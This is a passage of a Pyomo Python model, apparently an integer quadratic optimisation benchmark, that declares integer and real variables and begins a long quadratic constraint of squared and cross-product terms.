m.i60 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i61 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i62 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i63 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i64 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i65 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i66 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i67 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i68 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i69 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i70 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i71 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i72 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i73 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i74 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i75 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i76 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i77 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i78 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i79 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i80 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i81 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i82 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i83 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i84 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i85 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i86 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i87 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i88 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i89 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i90 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i91 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i92 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i93 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i94 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i95 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i96 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i97 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i98 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i99 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.i100 = Var(within=Integers,bounds=(0,1E20),initialize=0)
m.x101 = Var(within=Reals,bounds=(None,None),initialize=0)
m.obj = Objective(expr=m.x101, sense=minimize)
m.c1 = Constraint(expr=0.00841507*m.i1**2 + 0.0222536*m.i2**2 + 0.0056479*m.i3**2 + 0.00333322*m.i4**2 + 0.00490963*m.i5
**2 + 0.0221034*m.i6**2 + 0.00509899*m.i7**2 + 0.049464*m.i8**2 + 0.0171508*m.i9**2 + 0.0064643*
m.i10**2 + 0.0218437*m.i11**2 + 0.00346366*m.i12**2 + 0.0458502*m.i13**2 + 0.0747061*m.i14**2 +
0.0196511*m.i15**2 + 0.014222*m.i16**2 + 0.0147535*m.i17**2 + 0.00398615*m.i18**2 + 0.00644484*
m.i19**2 + 0.0322232*m.i20**2 + 0.00887889*m.i21**2 + 0.0434025*m.i22**2 + 0.00981376*m.i23**2 +
0.0133193*m.i24**2 + 0.00471036*m.i25**2 + 0.00359843*m.i26**2 + 0.0112312*m.i27**2 + 0.00476479*
m.i28**2 + 0.00356255*m.i29**2 + 0.0730121*m.i30**2 + 0.00785721*m.i31**2 + 0.0243787*m.i32**2 +
0.0171188*m.i33**2 + 0.00439547*m.i34**2 + 0.00502594*m.i35**2 + 0.0580619*m.i36**2 + 0.0135984*
m.i37**2 + 0.00254137*m.i38**2 + 0.0153341*m.i39**2 + 0.109758*m.i40**2 + 0.0346065*m.i41**2 +
0.0127589*m.i42**2 + 0.011147*m.i43**2 + 0.0156318*m.i44**2 + 0.00556588*m.i45**2 + 0.00302864*
m.i46**2 + 0.0214898*m.i47**2 + 0.00499587*m.i48**2 + 0.00864393*m.i49**2 + 0.0228248*m.i50**2 +
0.0077726*m.i51**2 + 0.00992767*m.i52**2 + 0.0184506*m.i53**2 + 0.0113481*m.i54**2 + 0.0067583*
m.i55**2 + 0.0150416*m.i56**2 + 0.00324193*m.i57**2 + 0.00478196*m.i58**2 + 0.0132471*m.i59**2 +
0.00273446*m.i60**2 + 0.0282459*m.i61**2 + 0.0230221*m.i62**2 + 0.0240972*m.i63**2 + 0.00829946*
m.i64**2 + 0.00688665*m.i65**2 + 0.00858803*m.i66**2 + 0.00778038*m.i67**2 + 0.0082583*m.i68**2
+ 0.022885*m.i69**2 + 0.00568332*m.i70**2 + 0.0234021*m.i71**2 + 0.00924249*m.i72**2 +
0.00669675*m.i73**2 + 0.0109501*m.i74**2 + 0.00663385*m.i75**2 + 0.00328058*m.i76**2 + 0.0112814*
m.i77**2 + 0.00341076*m.i78**2 + 0.0400653*m.i79**2 + 0.00876827*m.i80**2 + 0.0138276*m.i81**2 +
0.00246987*m.i82**2 + 0.0406516*m.i83**2 + 0.00947194*m.i84**2 + 0.00647449*m.i85**2 + 0.0107715*
m.i86**2 + 0.00803069*m.i87**2 + 0.106502*m.i88**2 + 0.00815263*m.i89**2 + 0.0171707*m.i90**2 +
0.0163522*m.i91**2 + 0.00911726*m.i92**2 + 0.00287317*m.i93**2 + 0.00360309*m.i94**2 + 0.00699161
*m.i95**2 + 0.0340959*m.i96**2 + 0.00958446*m.i97**2 + 0.0147951*m.i98**2 + 0.0177595*m.i99**2 +
0.0208523*m.i100**2 + 0.00692522*m.i1*m.i2 + 0.00066464*m.i1*m.i3 + 0.00388744*m.i1*m.i4 +
0.001108218*m.i1*m.i5 + 0.0046712*m.i1*m.i6 + 0.00771824*m.i1*m.i7 + 0.0020653*m.i1*m.i8 +
0.001524626*m.i1*m.i9 + 0.00484724*m.i1*m.i10 + 0.00733242*m.i1*m.i11 + 0.00556218*m.i1*m.i12 +
0.0052571*m.i1*m.i13 + 0.0218926*m.i1*m.i14 + 0.01352862*m.i1*m.i15 + 0.00549784*m.i1*m.i16 +
0.00235342*m.i1*m.i17 + 0.00448206*m.i1*m.i18 + 0.0072148*m.i1*m.i19 + 0.00958894*m.i1*m.i20 +
0.00376328*m.i1*m.i21 + 0.0117501*m.i1*m.i22 + 0.00575998*m.i1*m.i23 - 0.000109147*m.i1*m.i24 +
0.000604944*m.i1*m.i25 + 0.00473296*m.i1*m.i26 + 0.000356572*m.i1*m.i27 - 0.001552262*m.i1*m.i28
+ 0.00119092*m.i1*m.i29 + 0.01373684*m.i1*m.i30 + 0.0059113*m.i1*m.i31 + 0.00623524*m.i1*m.i32
+ 0.00801204*m.i1*m.i33 + 0.00108736*m.i1*m.i34 + 0.001491474*m.i1*m.i35 + 0.01080356*m.i1*m.i36
+ 0.00559202*m.i1*m.i37 + 7.8057e-6*m.i1*m.i38 + 0.00831004*m.i1*m.i39 + 0.001096208*m.i1*m.i40
+ 0.001136658*m.i1*m.i41 + 0.0073715*m.i1*m.i42 + 0.000726938*m.i1*m.i43 + 0.00621872*m.i1*m.i44
+ 0.00646596*m.i1*m.i45 + 0.00441466*m.i1*m.i46 + 0.001262528*m.i1*m.i47 + 0.00567366*m.i1*m.i48
+ 0.00690472*m.i1*m.i49 + 0.01140754*m.i1*m.i50 + 0.00275514*m.i1*m.i51 + 0.00633434*m.i1*m.i52
+ 0.00842252*m.i1*m.i53 + 0.00674544*m.i1*m.i54 + 0.00577156*m.i1*m.i55 + 0.000723972*m.i1*m.i56
+ 0.00617654*m.i1*m.i57 + 0.00426758*m.i1*m.i58 + 0.00581362*m.i1*m.i59 + 0.00305964*m.i1*m.i60
+ 0.00915838*m.i1*m.i61 + 0.00408204*m.i1*m.i62 + 0.00526036*m.i1*m.i63 + 0.00641708*m.i1*m.i64
+ 0.001311362*m.i1*m.i65 + 0.00589896*m.i1*m.i66 + 0.001450664*m.i1*m.i67 + 0.0054669*m.i1*m.i68
+ 0.00759698*m.i1*m.i69 + 0.0069591*m.i1*m.i70 + 0.0023689*m.i1*m.i71 + 0.0026146*m.i1*m.i72 +
0.00520422*m.i1*m.i73 + 0.00959956*m.i1*m.i74 + 0.00799166*m.i1*m.i75 + 0.00256248*m.i1*m.i76 +
0.01210352*m.i1*m.i77 + 0.00469514*m.i1*m.i78 + 0.00329676*m.i1*m.i79 + 0.0068214*m.i1*m.i80 +
0.00190637*m.i1*m.i81 + 0.00256972*m.i1*m.i82 - 0.00577696*m.i1*m.i83 + 0.00245394*m.i1*m.i84 +
0.00585966*m.i1*m.i85 + 0.00330078*m.i1*m.i86 + 0.00362852*m.i1*m.i87 + 0.0064137*m.i1*m.i88 +
0.00375038*m.i1*m.i89 + 0.00666048*m.i1*m.i90 + 0.00942176*m.i1*m.i91 + 0.00379828*m.i1*m.i92 +
0.00246526*m.i1*m.i93 + 0.0029997*m.i1*m.i94 + 0.00592606*m.i1*m.i95 + 0.0136565*m.i1*m.i96 +
0.00562112*m.i1*m.i97 + 0.0031101*m.i1*m.i98 + 0.00328418*m.i1*m.i99 + 0.00992138*m.i1*m.i100 +
0.01159836*m.i2*m.i3 + 0.00432612*m.i2*m.i4 + 0.01055774*m.i2*m.i5 + 0.0235592*m.i2*m.i6 +
0.0053913*m.i2*m.i7 + 0.01748966*m.i2*m.i8 + 0.01322526*m.i2*m.i9 + 0.01103896*m.i2*m.i10 +
0.001420928*m.i2*m.i11 + 0.00303766*m.i2*m.i12 + 0.0325414*m.i2*m.i13 + 0.0528886*m.i2*m.i14 +
0.0344486*m.i2*m.i15 + 0.01889664*m.i2*m.i16 + 0.01085498*m.i2*m.i17 + 0.01133696*m.i2*m.i18 +
0.0105108*m.i2*m.i19 + 0.041965*m.i2*m.i20 + 0.01908526*m.i2*m.i21 + 0.0438608*m.i2*m.i22 +
0.01760436*m.i2*m.i23 + 0.0177692*m.i2*m.i24 + 0.01401386*m.i2*m.i25 + 0.01130076*m.i2*m.i26 +
0.0201926*m.i2*m.i27 + 0.00893526*m.i2*m.i28 + 0.01013464*m.i2*m.i29 + 0.0522552*m.i2*m.i30 +
0.00674062*m.i2*m.i31 + 0.0386894*m.i2*m.i32 + 0.01840562*m.i2*m.i33 + 0.0079061*m.i2*m.i34 +
0.01050574*m.i2*m.i35 + 0.038882*m.i2*m.i36 + 0.0209782*m.i2*m.i37 + 0.00569346*m.i2*m.i38 +
0.0259324*m.i2*m.i39 + 0.0472088*m.i2*m.i40 + 0.0282636*m.i2*m.i41 + 0.0225892*m.i2*m.i42 +
0.01104052*m.i2*m.i43 + 0.0218496*m.i2*m.i44 + 0.00682534*m.i2*m.i45 + 0.01022898*m.i2*m.i46 +
0.0273094*m.i2*m.i47 + 0.01045064*m.i2*m.i48 + 0.01767338*m.i2*m.i49 + 0.0311902*m.i2*m.i50 +
0.0126455*m.i2*m.i51 + 0.0206168*m.i2*m.i52 + 0.0261894*m.i2*m.i53 + 0.024527*m.i2*m.i54 +
0.01734138*m.i2*m.i55 + 0.01224052*m.i2*m.i56 + 0.01152072*m.i2*m.i57 + 0.01028864*m.i2*m.i58 +
0.01883544*m.i2*m.i59 + 0.00908648*m.i2*m.i60 + 0.0449708*m.i2*m.i61 + 0.0363664*m.i2*m.i62 +
0.01577062*m.i2*m.i63 + 0.01266282*m.i2*m.i64 + 0.01385216*m.i2*m.i65 + 0.00440902*m.i2*m.i66 +
0.01711764*m.i2*m.i67 + 0.0110787*m.i2*m.i68 + 0.0341778*m.i2*m.i69 + 0.0156542*m.i2*m.i70 +
0.01891112*m.i2*m.i71 + 0.0216326*m.i2*m.i72 + 0.01534328*m.i2*m.i73 + 0.01661334*m.i2*m.i74 +
0.01534594*m.i2*m.i75 + 0.01116732*m.i2*m.i76 + 0.01402982*m.i2*m.i77 + 0.00963242*m.i2*m.i78 +
0.0200668*m.i2*m.i79 + 0.01379116*m.i2*m.i80 + 0.01910046*m.i2*m.i81 + 0.0077605*m.i2*m.i82 -
0.000954558*m.i2*m.i83 + 0.01255918*m.i2*m.i84 + 0.0126639*m.i2*m.i85 + 0.0201936*m.i2*m.i86 +
0.017931*m.i2*m.i87 + 0.0389418*m.i2*m.i88 + 0.00845916*m.i2*m.i89 + 0.0267914*m.i2*m.i90 +
0.0193905*m.i2*m.i91 + 0.01261014*m.i2*m.i92 + 0.0069012*m.i2*m.i93 + 0.00876014*m.i2*m.i94 +
0.01829908*m.i2*m.i95 + 0.0373396*m.i2*m.i96 + 0.0211262*m.i2*m.i97 + 0.01549032*m.i2*m.i98 +
0.0247114*m.i2*m.i99 + 0.0324248*m.i2*m.i100 - 0.000720538*m.i3*m.i4 + 0.00453322*m.i3*m.i5 +
0.00638226*m.i3*m.i6 + 0.000938158*m.i3*m.i7 + 0.0035154*m.i3*m.i8 + 0.00681962*m.i3*m.i9 +
0.006345*m.i3*m.i10 + 0.00232904*m.i3*m.i11 - 0.00054599*m.i3*m.i12 + 0.01850556*m.i3*m.i13 +
0.01892336*m.i3*m.i14 + 0.00820906*m.i3*m.i15 + 0.00848796*m.i3*m.i16 + 0.0100743*m.i3*m.i17 +
0.00327798*m.i3*m.i18 + 0.000498452*m.i3*m.i19 + 0.01775572*m.i3*m.i20 + 0.00919688*m.i3*m.i21 +
0.01282772*m.i3*m.i22 + 0.00853066*m.i3*m.i23 + 0.00506148*m.i3*m.i24 + 0.004557*m.i3*m.i25 +
0.001737768*m.i3*m.i26 + 0.00560326*m.i3*m.i27 + 0.00374962*m.i3*m.i28 + 0.000427408*m.i3*m.i29
+ 0.01831098*m.i3*m.i30 + 0.00791496*m.i3*m.i31 + 0.01306*m.i3*m.i32 + 0.0143109*m.i3*m.i33 +
0.00324578*m.i3*m.i34 + 0.00289704*m.i3*m.i35 + 0.01899172*m.i3*m.i36 + 0.00855898*m.i3*m.i37 +
0.000764782*m.i3*m.i38 + 0.01045622*m.i3*m.i39 + 0.0241684*m.i3*m.i40 + 0.01022702*m.i3*m.i41 +
0.0096569*m.i3*m.i42 + 0.00605256*m.i3*m.i43 + 0.0087656*m.i3*m.i44 + 0.00231868*m.i3*m.i45 +
0.003075*m.i3*m.i46 + 0.00904418*m.i3*m.i47 + 0.00346386*m.i3*m.i48 + 0.00970054*m.i3*m.i49 +
0.0107517*m.i3*m.i50 + 0.00833706*m.i3*m.i51 + 0.00601022*m.i3*m.i52 + 0.00885472*m.i3*m.i53 +
0.0087269*m.i3*m.i54 + 0.00799796*m.i3*m.i55 + 0.0077742*m.i3*m.i56 + 0.00233028*m.i3*m.i57 +
0.00392772*m.i3*m.i58 + 0.00960436*m.i3*m.i59 + 0.000506858*m.i3*m.i60 + 0.01485036*m.i3*m.i61 +
0.01172454*m.i3*m.i62 + 0.00763564*m.i3*m.i63 + 0.00510368*m.i3*m.i64 + 0.00739458*m.i3*m.i65 +
0.00321864*m.i3*m.i66 + 0.00506992*m.i3*m.i67 + 0.001582392*m.i3*m.i68 + 0.0133327*m.i3*m.i69 +
0.00346984*m.i3*m.i70 + 0.00591914*m.i3*m.i71 + 0.0050918*m.i3*m.i72 + 0.00762942*m.i3*m.i73 +
0.0072567*m.i3*m.i74 + 0.0028432*m.i3*m.i75 + 0.00258746*m.i3*m.i76 + 0.00665946*m.i3*m.i77 +
0.001559716*m.i3*m.i78 + 0.0114221*m.i3*m.i79 + 0.00359546*m.i3*m.i80 + 0.00675946*m.i3*m.i81 +
0.001328782*m.i3*m.i82 + 0.00450512*m.i3*m.i83 + 0.00859628*m.i3*m.i84 + 0.00541618*m.i3*m.i85 +
0.01126372*m.i3*m.i86 + 0.00604642*m.i3*m.i87 + 0.01802074*m.i3*m.i88 + 0.0056414*m.i3*m.i89 +
0.00952436*m.i3*m.i90 + 0.00568388*m.i3*m.i91 + 0.0086732*m.i3*m.i92 + 0.001482822*m.i3*m.i93 +
0.0026677*m.i3*m.i94 + 0.00675394*m.i3*m.i95 + 0.01169216*m.i3*m.i96 + 0.0076724*m.i3*m.i97 +
0.00761804*m.i3*m.i98 + 0.01192344*m.i3*m.i99 + 0.01326866*m.i3*m.i100 + 0.00169903*m.i4*m.i5 +
0.00300136*m.i4*m.i6 + 0.00385392*m.i4*m.i7 + 0.00382362*m.i4*m.i8 + 0.00575034*m.i4*m.i9 +
0.00125203*m.i4*m.i10 + 0.000828078*m.i4*m.i11 + 0.00404896*m.i4*m.i12 - 0.001180878*m.i4*m.i13
+ 0.00956206*m.i4*m.i14 + 0.00571904*m.i4*m.i15 + 0.0047927*m.i4*m.i16 + 0.001736122*m.i4*m.i17
+ 0.001900434*m.i4*m.i18 + 0.00498296*m.i4*m.i19 + 0.0055112*m.i4*m.i20 + 0.00199047*m.i4*m.i21
+ 0.00302926*m.i4*m.i22 + 0.001107052*m.i4*m.i23 + 0.0032099*m.i4*m.i24 + 0.00202704*m.i4*m.i25
+ 0.0049441*m.i4*m.i26 + 0.00296714*m.i4*m.i27 + 0.001430786*m.i4*m.i28 + 0.00335542*m.i4*m.i29
+ 0.0072271*m.i4*m.i30 + 0.001983328*m.i4*m.i31 + 0.00263338*m.i4*m.i32 + 0.0034098*m.i4*m.i33
+ 0.001978102*m.i4*m.i34 + 0.00248436*m.i4*m.i35 + 0.001037234*m.i4*m.i36 + 0.001931824*m.i4*
m.i37 + 0.00154955*m.i4*m.i38 + 0.00293776*m.i4*m.i39 - 0.01282698*m.i4*m.i40 + 0.001937926*m.i4*
m.i41 + 0.0052959*m.i4*m.i42 + 0.001856036*m.i4*m.i43 + 0.000740384*m.i4*m.i44 + 0.00372246*m.i4*
m.i45 + 0.00362974*m.i4*m.i46 + 0.001687258*m.i4*m.i47 + 0.00297792*m.i4*m.i48 + 0.0024381*m.i4*
m.i49 + 0.00581304*m.i4*m.i50 + 0.000775592*m.i4*m.i51 + 0.00512872*m.i4*m.i52 + 0.00302932*m.i4*
m.i53 + 0.00451004*m.i4*m.i54 + 0.00355054*m.i4*m.i55 + 0.000365898*m.i4*m.i56 + 0.00396452*m.i4*
m.i57 + 0.00218522*m.i4*m.i58 + 0.001602712*m.i4*m.i59 + 0.00378946*m.i4*m.i60 + 0.00528342*m.i4*
m.i61 + 0.00345546*m.i4*m.i62 + 0.0072364*m.i4*m.i63 + 0.00460504*m.i4*m.i64 + 0.00362066*m.i4*
m.i65 + 0.00176825*m.i4*m.i66 + 0.00326082*m.i4*m.i67 + 0.00494324*m.i4*m.i68 + 0.00478058*m.i4*
m.i69 + 0.0047424*m.i4*m.i70 + 0.00406804*m.i4*m.i71 + 0.00356438*m.i4*m.i72 + 0.0039191*m.i4*
m.i73 + 0.00506266*m.i4*m.i74 + 0.005213*m.i4*m.i75 + 0.00334114*m.i4*m.i76 + 0.00410168*m.i4*
m.i77 + 0.00325268*m.i4*m.i78 + 0.000621396*m.i4*m.i79 + 0.00679868*m.i4*m.i80 + 0.001665408*m.i4
*m.i81 + 0.00231708*m.i4*m.i82 - 0.0025243*m.i4*m.i83 + 0.00277762*m.i4*m.i84 + 0.0040202*m.i4*
m.i85 + 0.001500566*m.i4*m.i86 + 0.001680814*m.i4*m.i87 + 0.00640404*m.i4*m.i88 + 0.00397656*m.i4
*m.i89 + 0.000508164*m.i4*m.i90 + 0.00565534*m.i4*m.i91 + 0.0031999*m.i4*m.i92 + 0.0007233*m.i4*
m.i93 + 0.001347788*m.i4*m.i94 + 0.00386662*m.i4*m.i95 + 0.0056032*m.i4*m.i96 + 0.00392786*m.i4*
m.i97 + 0.0032706*m.i4*m.i98 + 0.000716722*m.i4*m.i99 + 0.00200998*m.i4*m.i100 + 0.00725878*m.i5*
m.i6 + 0.000634496*m.i5*m.i7 + 0.0112129*m.i5*m.i8 + 0.006535*m.i5*m.i9 + 0.0076756*m.i5*m.i10 -
0.00455426*m.i5*m.i11 + 0.001111236*m.i5*m.i12 + 0.01473142*m.i5*m.i13 + 0.01556352*m.i5*m.i14 +
0.00889148*m.i5*m.i15 + 0.00833956*m.i5*m.i16 + 0.01155304*m.i5*m.i17 + 0.0044319*m.i5*m.i18 +
0.0061696*m.i5*m.i19 + 0.01660846*m.i5*m.i20 + 0.00921042*m.i5*m.i21 + 0.01240074*m.i5*m.i22 +
0.00930536*m.i5*m.i23 + 0.00636938*m.i5*m.i24 + 0.00582298*m.i5*m.i25 + 0.00314834*m.i5*m.i26 +
0.00569034*m.i5*m.i27 + 0.00513186*m.i5*m.i28 + 0.00443806*m.i5*m.i29 + 0.01398194*m.i5*m.i30 +
0.00649478*m.i5*m.i31 + 0.01579432*m.i5*m.i32 + 0.00734872*m.i5*m.i33 + 0.0056108*m.i5*m.i34 +
0.00623672*m.i5*m.i35 + 0.01544598*m.i5*m.i36 + 0.01144796*m.i5*m.i37 + 0.0024117*m.i5*m.i38 +
0.00970728*m.i5*m.i39 + 0.0182302*m.i5*m.i40 + 0.00790876*m.i5*m.i41 + 0.00731488*m.i5*m.i42 +
0.00543454*m.i5*m.i43 + 0.00647722*m.i5*m.i44 + 0.0035064*m.i5*m.i45 + 0.00307696*m.i5*m.i46 +
0.00716814*m.i5*m.i47 + 0.001828662*m.i5*m.i48 + 0.00846664*m.i5*m.i49 + 0.01292148*m.i5*m.i50 +
0.0081737*m.i5*m.i51 + 0.00647086*m.i5*m.i52 + 0.00609644*m.i5*m.i53 + 0.00842446*m.i5*m.i54 +
0.00619594*m.i5*m.i55 + 0.01114364*m.i5*m.i56 + 0.00464056*m.i5*m.i57 + 0.00294786*m.i5*m.i58 +
0.01085566*m.i5*m.i59 + 0.00324938*m.i5*m.i60 + 0.01321296*m.i5*m.i61 + 0.00956118*m.i5*m.i62 +
0.00799502*m.i5*m.i63 + 0.00255928*m.i5*m.i64 + 0.00635808*m.i5*m.i65 + 0.00425494*m.i5*m.i66 +
0.00743456*m.i5*m.i67 + 0.003997*m.i5*m.i68 + 0.01327542*m.i5*m.i69 + 0.00624764*m.i5*m.i70 +
0.00544782*m.i5*m.i71 + 0.00583882*m.i5*m.i72 + 0.00712322*m.i5*m.i73 + 0.00675538*m.i5*m.i74 +
0.00471928*m.i5*m.i75 + 0.00331686*m.i5*m.i76 + 0.0064726*m.i5*m.i77 + 0.0043073*m.i5*m.i78 +
0.01376458*m.i5*m.i79 + 0.00590054*m.i5*m.i80 + 0.00544478*m.i5*m.i81 + 0.00433406*m.i5*m.i82 +
0.0018936*m.i5*m.i83 + 0.00732892*m.i5*m.i84 + 0.00654804*m.i5*m.i85 + 0.00769986*m.i5*m.i86 +
0.00924248*m.i5*m.i87 + 0.01858866*m.i5*m.i88 + 0.00588762*m.i5*m.i89 + 0.00671372*m.i5*m.i90 +
0.00513832*m.i5*m.i91 + 0.00597632*m.i5*m.i92 + 0.0033572*m.i5*m.i93 + 0.00718978*m.i5*m.i94 +
0.00692006*m.i5*m.i95 + 0.0082357*m.i5*m.i96 + 0.00798976*m.i5*m.i97 + 0.00578018*m.i5*m.i98 +
0.00997244*m.i5*m.i99 + 0.00861536*m.i5*m.i100 + 0.00682146*m.i6*m.i7 + 0.00318158*m.i6*m.i8 +
0.01402384*m.i6*m.i9 + 0.01146794*m.i6*m.i10 + 0.00514562*m.i6*m.i11 + 0.001749894*m.i6*m.i12 +
0.0349226*m.i6*m.i13 + 0.0204032*m.i6*m.i14 + 0.0257432*m.i6*m.i15 + 0.01758104*m.i6*m.i16 +
0.01908054*m.i6*m.i17 + 0.00928378*m.i6*m.i18 + 0.00320468*m.i6*m.i19 + 0.0315536*m.i6*m.i20 +
0.01792788*m.i6*m.i21 + 0.0231518*m.i6*m.i22 + 0.01485588*m.i6*m.i23 + 0.01959078*m.i6*m.i24 +
0.01015748*m.i6*m.i25 + 0.00771848*m.i6*m.i26 + 0.0203708*m.i6*m.i27 + 0.00861336*m.i6*m.i28 +
0.00733064*m.i6*m.i29 + 0.0211284*m.i6*m.i30 + 0.01136376*m.i6*m.i31 + 0.0298052*m.i6*m.i32 +
0.01763386*m.i6*m.i33 + 0.01196962*m.i6*m.i34 + 0.00970124*m.i6*m.i35 + 0.0426536*m.i6*m.i36 +
0.0162704*m.i6*m.i37 + 0.00511032*m.i6*m.i38 + 0.0211034*m.i6*m.i39 + 0.0536216*m.i6*m.i40 +
0.0314338*m.i6*m.i41 + 0.0212846*m.i6*m.i42 + 0.01544516*m.i6*m.i43 + 0.0203852*m.i6*m.i44 +
0.00711214*m.i6*m.i45 + 0.01012528*m.i6*m.i46 + 0.0378006*m.i6*m.i47 + 0.00769828*m.i6*m.i48 +
0.01043538*m.i6*m.i49 + 0.0235092*m.i6*m.i50 + 0.00574084*m.i6*m.i51 + 0.01540822*m.i6*m.i52 +
0.01066192*m.i6*m.i53 + 0.01947344*m.i6*m.i54 + 0.01212224*m.i6*m.i55 + 0.01841288*m.i6*m.i56 +
0.00863178*m.i6*m.i57 + 0.0123986*m.i6*m.i58 + 0.01033934*m.i6*m.i59 + 0.00473636*m.i6*m.i60 +
0.0271978*m.i6*m.i61 + 0.0244978*m.i6*m.i62 + 0.0206042*m.i6*m.i63 + 0.0123061*m.i6*m.i64 +
0.00969592*m.i6*m.i65 + 0.0105285*m.i6*m.i66 + 0.01296694*m.i6*m.i67 + 0.00467684*m.i6*m.i68 +
0.0206522*m.i6*m.i69 + 0.01181216*m.i6*m.i70 + 0.034569*m.i6*m.i71 + 0.01713412*m.i6*m.i72 +
0.00997084*m.i6*m.i73 + 0.00934556*m.i6*m.i74 + 0.00446476*m.i6*m.i75 + 0.00591468*m.i6*m.i76 +
0.00902732*m.i6*m.i77 + 0.00684842*m.i6*m.i78 + 0.000346556*m.i6*m.i79 + 0.01344964*m.i6*m.i80 +
0.028585*m.i6*m.i81 + 0.00365848*m.i6*m.i82 + 0.0233826*m.i6*m.i83 + 0.01097966*m.i6*m.i84 +
0.01159854*m.i6*m.i85 + 0.0132315*m.i6*m.i86 + 0.00973116*m.i6*m.i87 + 0.01749474*m.i6*m.i88 +
0.00153948*m.i6*m.i89 + 0.01386412*m.i6*m.i90 + 0.01199914*m.i6*m.i91 + 0.0141917*m.i6*m.i92 +
0.001321806*m.i6*m.i93 + 0.00438272*m.i6*m.i94 + 0.01131596*m.i6*m.i95 + 0.01535776*m.i6*m.i96 +
0.01709068*m.i6*m.i97 + 0.024088*m.i6*m.i98 + 0.0176488*m.i6*m.i99 + 0.0244376*m.i6*m.i100 +
0.00488516*m.i7*m.i8 + 0.00626372*m.i7*m.i9 + 0.001990118*m.i7*m.i10 + 0.00360408*m.i7*m.i11 +
0.0044488*m.i7*m.i12 + 0.00345036*m.i7*m.i13 + 0.01022598*m.i7*m.i14 + 0.00914736*m.i7*m.i15 +
0.00744612*m.i7*m.i16 + 0.0041386*m.i7*m.i17 + 0.00439536*m.i7*m.i18 + 0.00478826*m.i7*m.i19 +
0.00946126*m.i7*m.i20 + 0.00383118*m.i7*m.i21 + 0.00577738*m.i7*m.i22 + 0.0023517*m.i7*m.i23 +
0.0050588*m.i7*m.i24 + 0.0021953*m.i7*m.i25 + 0.00304582*m.i7*m.i26 + 0.0025687*m.i7*m.i27 +
0.001019412*m.i7*m.i28 + 0.001803492*m.i7*m.i29 + 0.00840076*m.i7*m.i30 + 0.00405006*m.i7*m.i31
+ 0.00330894*m.i7*m.i32 + 0.00379124*m.i7*m.i33 + 0.00297878*m.i7*m.i34 + 0.00257924*m.i7*m.i35
+ 0.00710268*m.i7*m.i36 + 0.00290856*m.i7*m.i37 + 0.00084645*m.i7*m.i38 + 0.00616224*m.i7*m.i39
+ 0.00012188*m.i7*m.i40 + 0.00931498*m.i7*m.i41 + 0.00783*m.i7*m.i42 + 0.00769852*m.i7*m.i43 +
0.00783756*m.i7*m.i44 + 0.0049081*m.i7*m.i45 + 0.00379762*m.i7*m.i46 + 0.00691856*m.i7*m.i47 +
0.00516014*m.i7*m.i48 + 0.00525658*m.i7*m.i49 + 0.00529626*m.i7*m.i50 + 0.00103022*m.i7*m.i51 +
0.00545452*m.i7*m.i52 + 0.00609146*m.i7*m.i53 + 0.0066465*m.i7*m.i54 + 0.0057959*m.i7*m.i55 +
0.00384568*m.i7*m.i56 + 0.00518642*m.i7*m.i57 + 0.0049888*m.i7*m.i58 + 0.00240984*m.i7*m.i59 +
0.001870666*m.i7*m.i60 + 0.00856542*m.i7*m.i61 + 0.00433228*m.i7*m.i62 + 0.00926318*m.i7*m.i63 +
0.00802564*m.i7*m.i64 + 0.002679*m.i7*m.i65 + 0.00656044*m.i7*m.i66 + 0.00189873*m.i7*m.i67 +
0.00559974*m.i7*m.i68 + 0.0059088*m.i7*m.i69 + 0.00502274*m.i7*m.i70 + 0.00714092*m.i7*m.i71 +
0.00451814*m.i7*m.i72 + 0.0055096*m.i7*m.i73 + 0.0054579*m.i7*m.i74 + 0.00428152*m.i7*m.i75 +
0.00201372*m.i7*m.i76 + 0.00763776*m.i7*m.i77 + 0.001767634*m.i7*m.i78 - 0.00404984*m.i7*m.i79 +
0.00693072*m.i7*m.i80 + 0.00453578*m.i7*m.i81 + 0.001431356*m.i7*m.i82 + 0.001000832*m.i7*m.i83
+ 0.00363592*m.i7*m.i84 + 0.00399748*m.i7*m.i85 + 0.00244412*m.i7*m.i86 - 0.00038172*m.i7*m.i87
+ 0.00670104*m.i7*m.i88 + 0.00351634*m.i7*m.i89 + 0.000192176*m.i7*m.i90 + 0.00766242*m.i7*m.i91
+ 0.00431432*m.i7*m.i92 + 0.00099522*m.i7*m.i93 + 0.00215394*m.i7*m.i94 + 0.00467712*m.i7*m.i95
